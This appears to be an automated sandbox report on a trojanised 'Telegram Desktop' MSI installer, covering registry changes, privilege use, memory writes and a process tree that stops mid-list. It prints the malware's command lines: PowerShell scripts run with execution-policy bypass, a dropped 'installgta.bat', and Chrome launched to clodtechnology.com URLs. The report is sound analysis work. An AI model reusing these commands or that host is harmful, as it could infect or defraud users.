Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000789d96067ff55f5b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000789d96060000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff000000000700010000680900789d9606000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000789d960600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000789d960600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4932 timeout.exe

pid	process
4932	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

msiexec.exe

description	ioc	process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f	msiexec.exe

Modifies registry class 24 IoCs

Processes:

msiexec.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\PackageName = "Telegram Desktop (19).msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8129A8AF623715641AB21A9FEE34F919	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\Media\1 = ";"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9A7FC00C588A6FA44BE0726C586806C3\8129A8AF623715641AB21A9FEE34F919	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8129A8AF623715641AB21A9FEE34F919\MainFeature	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\ProductName = "Setup"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\Version = "69897"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9A7FC00C588A6FA44BE0726C586806C3	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\PackageCode = "FCCA904F0847AF74D82D963E6563FC5F"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\ProductIcon = "C:\\Windows\\Installer\\{FA8A9218-7326-4651-A12B-A1F9EE439F91}\\MTGALauncher.exe"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\AuthorizedLUAApp = "0"	msiexec.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exemsiexec.exeMsiExec.exechrome.exechrome.exechrome.exepowershell.exechrome.exechrome.exechrome.exe

pid	process
3352	powershell.exe
3352	powershell.exe
1992	powershell.exe
1992	powershell.exe
4008	powershell.exe
4008	powershell.exe
1244	powershell.exe
1244	powershell.exe
3188	msiexec.exe
3188	msiexec.exe
2640	MsiExec.exe
2640	MsiExec.exe
3176	chrome.exe
3176	chrome.exe
4356	chrome.exe
4356	chrome.exe
2504	chrome.exe
2504	chrome.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
4460	chrome.exe
4460	chrome.exe
964	chrome.exe
964	chrome.exe
1160	chrome.exe
1160	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

chrome.exe

pid process

2504 chrome.exe
2504 chrome.exe
2504 chrome.exe
2504 chrome.exe
2504 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exepowershell.exesrtasks.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	1388	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1388	msiexec.exe
Token: SeSecurityPrivilege	3188	msiexec.exe
Token: SeCreateTokenPrivilege	1388	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1388	msiexec.exe
Token: SeLockMemoryPrivilege	1388	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1388	msiexec.exe
Token: SeMachineAccountPrivilege	1388	msiexec.exe
Token: SeTcbPrivilege	1388	msiexec.exe
Token: SeSecurityPrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeLoadDriverPrivilege	1388	msiexec.exe
Token: SeSystemProfilePrivilege	1388	msiexec.exe
Token: SeSystemtimePrivilege	1388	msiexec.exe
Token: SeProfSingleProcessPrivilege	1388	msiexec.exe
Token: SeIncBasePriorityPrivilege	1388	msiexec.exe
Token: SeCreatePagefilePrivilege	1388	msiexec.exe
Token: SeCreatePermanentPrivilege	1388	msiexec.exe
Token: SeBackupPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeShutdownPrivilege	1388	msiexec.exe
Token: SeDebugPrivilege	1388	msiexec.exe
Token: SeAuditPrivilege	1388	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1388	msiexec.exe
Token: SeChangeNotifyPrivilege	1388	msiexec.exe
Token: SeRemoteShutdownPrivilege	1388	msiexec.exe
Token: SeUndockPrivilege	1388	msiexec.exe
Token: SeSyncAgentPrivilege	1388	msiexec.exe
Token: SeEnableDelegationPrivilege	1388	msiexec.exe
Token: SeManageVolumePrivilege	1388	msiexec.exe
Token: SeImpersonatePrivilege	1388	msiexec.exe
Token: SeCreateGlobalPrivilege	1388	msiexec.exe
Token: SeBackupPrivilege	4628	vssvc.exe
Token: SeRestorePrivilege	4628	vssvc.exe
Token: SeAuditPrivilege	4628	vssvc.exe
Token: SeBackupPrivilege	3188	msiexec.exe
Token: SeRestorePrivilege	3188	msiexec.exe
Token: SeRestorePrivilege	3188	msiexec.exe
Token: SeTakeOwnershipPrivilege	3188	msiexec.exe
Token: SeRestorePrivilege	3188	msiexec.exe
Token: SeTakeOwnershipPrivilege	3188	msiexec.exe
Token: SeRestorePrivilege	3188	msiexec.exe
Token: SeTakeOwnershipPrivilege	3188	msiexec.exe
Token: SeRestorePrivilege	3188	msiexec.exe
Token: SeTakeOwnershipPrivilege	3188	msiexec.exe
Token: SeRestorePrivilege	3188	msiexec.exe
Token: SeTakeOwnershipPrivilege	3188	msiexec.exe
Token: SeRestorePrivilege	3188	msiexec.exe
Token: SeTakeOwnershipPrivilege	3188	msiexec.exe
Token: SeDebugPrivilege	3352	powershell.exe
Token: SeBackupPrivilege	4968	srtasks.exe
Token: SeRestorePrivilege	4968	srtasks.exe
Token: SeSecurityPrivilege	4968	srtasks.exe
Token: SeTakeOwnershipPrivilege	4968	srtasks.exe
Token: SeBackupPrivilege	4968	srtasks.exe
Token: SeRestorePrivilege	4968	srtasks.exe
Token: SeSecurityPrivilege	4968	srtasks.exe
Token: SeTakeOwnershipPrivilege	4968	srtasks.exe
Token: SeRestorePrivilege	3188	msiexec.exe
Token: SeTakeOwnershipPrivilege	3188	msiexec.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeRestorePrivilege	3188	msiexec.exe
Token: SeTakeOwnershipPrivilege	3188	msiexec.exe
Token: SeDebugPrivilege	4008	powershell.exe

Suspicious use of FindShellTrayWindow 44 IoCs

Processes:

msiexec.exechrome.exe

pid	process
1388	msiexec.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
1388	msiexec.exe

Suspicious use of SendNotifyMessage 40 IoCs

Processes:

chrome.exe

pid	process
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe
2504	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exeMsiExec.exeMsiExec.execmd.execmd.execmd.exechrome.execmd.exechrome.exe

description	pid	process	target process
PID 3188 wrote to memory of 4968	3188	msiexec.exe	srtasks.exe
PID 3188 wrote to memory of 4968	3188	msiexec.exe	srtasks.exe
PID 3188 wrote to memory of 4328	3188	msiexec.exe	MsiExec.exe
PID 3188 wrote to memory of 4328	3188	msiexec.exe	MsiExec.exe
PID 3188 wrote to memory of 4328	3188	msiexec.exe	MsiExec.exe
PID 4328 wrote to memory of 3352	4328	MsiExec.exe	powershell.exe
PID 4328 wrote to memory of 3352	4328	MsiExec.exe	powershell.exe
PID 4328 wrote to memory of 3352	4328	MsiExec.exe	powershell.exe
PID 4328 wrote to memory of 1992	4328	MsiExec.exe	powershell.exe
PID 4328 wrote to memory of 1992	4328	MsiExec.exe	powershell.exe
PID 4328 wrote to memory of 1992	4328	MsiExec.exe	powershell.exe
PID 4328 wrote to memory of 4008	4328	MsiExec.exe	powershell.exe
PID 4328 wrote to memory of 4008	4328	MsiExec.exe	powershell.exe
PID 4328 wrote to memory of 4008	4328	MsiExec.exe	powershell.exe
PID 4328 wrote to memory of 1244	4328	MsiExec.exe	powershell.exe
PID 4328 wrote to memory of 1244	4328	MsiExec.exe	powershell.exe
PID 4328 wrote to memory of 1244	4328	MsiExec.exe	powershell.exe
PID 3188 wrote to memory of 2640	3188	msiexec.exe	MsiExec.exe
PID 3188 wrote to memory of 2640	3188	msiexec.exe	MsiExec.exe
PID 3188 wrote to memory of 2640	3188	msiexec.exe	MsiExec.exe
PID 2640 wrote to memory of 4548	2640	MsiExec.exe	cmd.exe
PID 2640 wrote to memory of 4548	2640	MsiExec.exe	cmd.exe
PID 2640 wrote to memory of 4548	2640	MsiExec.exe	cmd.exe
PID 4548 wrote to memory of 4748	4548	cmd.exe	chcp.com
PID 4548 wrote to memory of 4748	4548	cmd.exe	chcp.com
PID 4548 wrote to memory of 4748	4548	cmd.exe	chcp.com
PID 2640 wrote to memory of 2404	2640	MsiExec.exe	cmd.exe
PID 2640 wrote to memory of 2404	2640	MsiExec.exe	cmd.exe
PID 2640 wrote to memory of 2404	2640	MsiExec.exe	cmd.exe
PID 3188 wrote to memory of 3816	3188	msiexec.exe	cmd.exe
PID 3188 wrote to memory of 3816	3188	msiexec.exe	cmd.exe
PID 3816 wrote to memory of 1680	3816	cmd.exe	cmd.exe
PID 3816 wrote to memory of 1680	3816	cmd.exe	cmd.exe
PID 1680 wrote to memory of 2184	1680	cmd.exe	chrome.exe
PID 1680 wrote to memory of 2184	1680	cmd.exe	chrome.exe
PID 3816 wrote to memory of 4828	3816	cmd.exe	cmd.exe
PID 3816 wrote to memory of 4828	3816	cmd.exe	cmd.exe
PID 2184 wrote to memory of 216	2184	chrome.exe	chrome.exe
PID 2184 wrote to memory of 216	2184	chrome.exe	chrome.exe
PID 4828 wrote to memory of 2504	4828	cmd.exe	chrome.exe
PID 4828 wrote to memory of 2504	4828	cmd.exe	chrome.exe
PID 2504 wrote to memory of 2268	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 2268	2504	chrome.exe	chrome.exe
PID 3816 wrote to memory of 2900	3816	cmd.exe	cacls.exe
PID 3816 wrote to memory of 2900	3816	cmd.exe	cacls.exe
PID 3816 wrote to memory of 4932	3816	cmd.exe	timeout.exe
PID 3816 wrote to memory of 4932	3816	cmd.exe	timeout.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe
PID 2504 wrote to memory of 4772	2504	chrome.exe	chrome.exe

C:\Windows\system32\msiexec.exe
msiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\Telegram Desktop (19).msi"
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1388

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4968

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 21F305B64C4B2C86E4DDCC38AAF34682
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8FAA.ps1"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3352

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssE58F.ps1"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssEB7E.ps1"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssF1DB.ps1"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1244

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss775B.ps1"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5020

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 18FEAF93D7F0DD3B71BF5CE9035A7BFE E Global\MSI0000
2⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2640

C:\Windows\SysWOW64\cmd.exe
/C "C:\Users\Admin\AppData\Local\Temp\{1D2A053B-04E8-4CC7-9371-50EBAAABEB61}.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:4548

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:4748

C:\Windows\SysWOW64\cmd.exe
/C "C:\Users\Admin\AppData\Local\Temp\{1D2A053B-04E8-4CC7-9371-50EBAAABEB61}.bat"
3⤵
PID:2404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files\Wizards of the Coast\MTGA\installgta.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:3816

C:\Windows\system32\cmd.exe
cmd /c start /b chrome.exe https://clodtechnology.com/yy28i5/index/b1/?servername=msi
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://clodtechnology.com/yy28i5/index/b1/?servername=msi
4⤵
- Suspicious use of WriteProcessMemory
PID:2184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffee71d4f50,0x7ffee71d4f60,0x7ffee71d4f70
5⤵
PID:216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1680,13185303285010554810,9523423208102672651,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1728 /prefetch:2
5⤵
PID:2460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1680,13185303285010554810,9523423208102672651,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2044 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4356

C:\Windows\system32\cmd.exe
cmd /c start /b chrome.exe https://clodtechnology.com/yy28i5/index/b2/?servername=msi
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://clodtechnology.com/yy28i5/index/b2/?servername=msi
4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee71d4f50,0x7ffee71d4f60,0x7ffee71d4f70
5⤵
PID:2268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1656 /prefetch:2
5⤵
PID:4772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1752 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 /prefetch:8
5⤵
PID:32

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2912 /prefetch:1
5⤵
PID:928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:1
5⤵
PID:4092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
5⤵
PID:4004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
5⤵
PID:4480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4064 /prefetch:8
5⤵
PID:4520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3196 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
5⤵
PID:4800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4948 /prefetch:8
5⤵
PID:4848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3128 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:964

C:\Program Files\Google\Chrome\Application\chrome.exe
